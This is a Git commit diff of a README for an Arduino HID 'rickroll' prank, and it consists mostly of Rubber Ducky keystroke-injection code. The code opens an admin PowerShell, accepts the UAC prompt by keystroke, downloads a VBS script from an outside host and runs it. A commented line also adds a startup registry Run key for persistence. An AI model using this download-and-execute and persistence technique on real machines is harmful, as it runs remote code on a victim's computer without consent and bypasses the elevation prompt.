Some updates (if you always want the latest version, check my repo)

This commit is contained in:
Sam van der Kris 2017-03-01 17:23:43 +01:00
parent cb5254ffd6
commit 6c88645e34
1 changed files with 11 additions and 7 deletions

View File

@ -2,12 +2,16 @@ GitLab repo: https://gitlab.com/WarKitteh/arduino-hid-rickroll
Ducky code: Ducky code:
`DELAY 1000 `DELAY 1000
GUI r GUI x
DELAY 100 DELAY 200
STRING cmd UP
DELAY 100 REPEAT 7
DELAY 200
ENTER ENTER
DELAY 100 DELAY 500
STRING powershell (new-object System.Net.WebClient).DownloadFile('https://pixelcoding.nl/download/rickroll.vbs','%TEMP%\rickroll.vbs'); && start %TEMP%\rickroll.vbs && exit ALT y
DELAY 100 DELAY 200
STRING powershell (new-object System.Net.WebClient).DownloadFile('https://gitlab.com/WarKitteh/arduino-hid-rickroll/raw/cee63bb220c856587462b29d61bdfc70c806805f/rickroll.vbs','%userprofile%\rickroll.vbs'); && start %userprofile%\rickroll.vbs && exit
REM powershell (new-object System.Net.WebClient).DownloadFile('https://gitlab.com/WarKitteh/arduino-hid-rickroll/raw/cee63bb220c856587462b29d61bdfc70c806805f/rickroll.vbs','%userprofile%\rickroll.vbs'); && start %userprofile%\rickroll.vbs && reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v TotallyNotShadyStartupItem /d %userprofile%\rickroll.vbs && exit
DELAY 200
ENTER` ENTER`